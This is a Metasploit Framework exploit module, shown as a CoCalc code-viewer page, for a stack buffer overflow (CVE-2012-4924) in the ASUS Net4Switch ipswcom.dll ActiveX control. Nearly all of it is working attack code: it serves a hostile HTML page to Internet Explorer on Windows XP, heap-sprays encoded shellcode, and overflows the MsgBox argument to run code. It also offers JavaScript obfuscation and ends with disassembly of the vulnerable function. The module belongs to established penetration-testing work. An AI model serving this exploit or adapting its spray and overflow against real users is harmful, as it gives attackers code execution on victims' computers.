CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  def initialize(info={})

12
    super(update_info(info,

13
      'Name'           => "ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow",

14
      'Description'    => %q{

15
          This module exploits a vulnerability found in ASUS Net4Switch's ipswcom.dll

16
        ActiveX control.  A buffer overflow condition is possible in multiple places due

17
        to the use of the CxDbgPrint() function, which allows remote attackers to gain

18
        arbitrary code execution under the context of the user.

19
      },

20
      'License'        => MSF_LICENSE,

21
      'Author'         =>

22
        [

23
          'Dmitriy Evdokimov', #Initial discovery, poc

24
          'sinn3r'             #Metasploit

25
        ],

26
      'References'     =>

27
        [

28
          [ 'CVE', '2012-4924' ],

29
          [ 'OSVDB', '79438' ],

30
          [ 'URL', 'http://dsecrg.com/pages/vul/show.php?id=417' ]

31
        ],

32
      'Payload'        =>

33
        {

34
          'BadChars'        => "\x00",

35
          'StackAdjustment' => -3500,

36
        },

37
      'DefaultOptions'  =>

38
        {

39
          'EXITFUNC'         => "seh",

40
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

41
        },

42
      'Platform'       => 'win',

43
      'Targets'        =>

44
        [

45
          [ 'Automatic', {} ],

46
          [ 'IE 6 on Windows XP SP3', { 'Max' => '0x40000', 'Offset' => '0x500' } ],

47
          [ 'IE 7 on Windows XP SP3', { 'Max' => '0x40000', 'Offset' => '0x500' } ]

48
        ],

49
      'Privileged'     => false,

50
      'DisclosureDate' => '2012-02-17',

51
      'DefaultTarget'  => 0))

52


53
    register_options(

54
      [

55
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])

56
      ])

57
  end

58


59
  def get_target(agent)

60
    return target if target.name != 'Automatic'

61


62
    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/

63
      return targets[1]  #IE 6 on Windows XP SP3

64
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/

65
      return targets[2]  #IE 7 on Windows XP SP3

66
    else

67
      return nil

68
    end

69
  end

70


71
  def on_request_uri(cli, request)

72
    agent = request.headers['User-Agent']

73
    my_target = get_target(agent)

74


75
    if my_target.nil?

76
      print_error("Browser not supported: #{agent.to_s}")

77
      send_not_found(cli)

78
      return

79
    end

80


81
    p = payload.encoded

82
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))

83
    nops = Rex::Text.to_unescape(make_nops(4))

84
    randnop = rand_text_alpha(rand(100) + 1)

85


86
    spray = <<-JS

87
    var heap_obj = new heapLib.ie(0x20000);

88
    var code = unescape("#{js_code}");

89
    var #{randnop} = "#{nops}";

90
    var nops = unescape(#{randnop});

91


92
    while (nops.length < 0x80000) nops += nops;

93
    var offset = nops.substring(0, #{my_target['Offset']});

94
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

95


96
    while (shellcode.length < 0x40000) shellcode += shellcode;

97
    var block = shellcode.substring(0, (0x80000-6)/2);

98


99
    heap_obj.gc();

100


101
    for (var i=1; i < 0x300; i++) {

102
      heap_obj.alloc(block);

103
    }

104
    JS

105


106
    spray = heaplib(spray, {:noobfu => true})

107


108
    js = <<-JS

109
    var obj = new ActiveXObject("ipswcom.IPSWComItf");

110


111
    #{spray}

112


113
    function generate_padding(d, s) {

114
      var tmp = d;

115
      while (tmp.length < s) {

116
        tmp += tmp;

117
      }

118
      var buf = tmp.substring(0, s/2);

119
      tmp = null;

120
      return buf;

121
    }

122


123
    var arg1 = generate_padding(unescape("%u4141"), 4);

124


125
    var arg2 = "A"; // Expands to 0x0041, helps us to align the stack

126
    arg2 += generate_padding(unescape("%u4343"), 2680);

127
    arg2 += unescape("%u4242%u4242");

128
    arg2 += unescape("%u0d0d%u0d0d");

129
    arg2 += generate_padding(unescape("%u0d0d"), #{my_target['Max']}-arg2.length);

130


131
    obj.MsgBox(arg1, arg2, 2);

132
    JS

133


134
    #obfuscate on demand

135
    if datastore['OBFUSCATE']

136
      js = ::Rex::Exploitation::JSObfu.new(js)

137
      js.obfuscate(memory_sensitive: true)

138
    end

139


140
    html = <<-EOS

141
    <html>

142
    <head>

143
    </head>

144
    <body>

145
    <script>

146
    #{js}

147
    </script>

148
    </body>

149
    </html>

150
    EOS

151


152
    html = html.gsub(/\t\t/, '')

153


154
    print_status("Sending HTML")

155
    send_response(cli, html, {'Content-Type'=>'text/html'})

156


157
  end

158
end

159


160
=begin

161
Download:

162
http://www.softpedia.com/progDownload/ASUS-Net4Switch-Download-203619.html

163


164
clsid:1B9E86D8-7CAF-46C8-9938-569B21E17A8E

165
C:\Program Files\ASUS\Net4Switch\ipswcom.dll

166


167
.text:10030523                 push    ecx

168
.text:10030524                 mov     eax, [ebp+arg_C]

169
.text:10030527                 mov     [ebp+var_4], eax

170
.text:1003052A                 cmp     [ebp+var_4], 0

171
.text:1003052E                 jz      short loc_10030541  <-- uType 10h

172
.text:10030530                 cmp     [ebp+var_4], 1

173
.text:10030534                 jz      short loc_10030573  <-- uType 44h

174
.text:10030536                 cmp     [ebp+var_4], 2

175
.text:1003053A                 jz      short loc_100305A5  <-- CxDbgPrint

176
...

177
.text:100305A5 loc_100305A5:                           ; CODE XREF: MsgBox+1Aj

178
.text:100305A5                 mov     eax, [ebp+lpText]

179
.text:100305A8                 push    eax

180
.text:100305A9                 push    offset aIpsw_alertS ; "[IPSW_alert] = %s"

181
.text:100305AE                 push    0FFh

182
.text:100305B3                 call    ds:CxDbgPrint

183
=end

184


185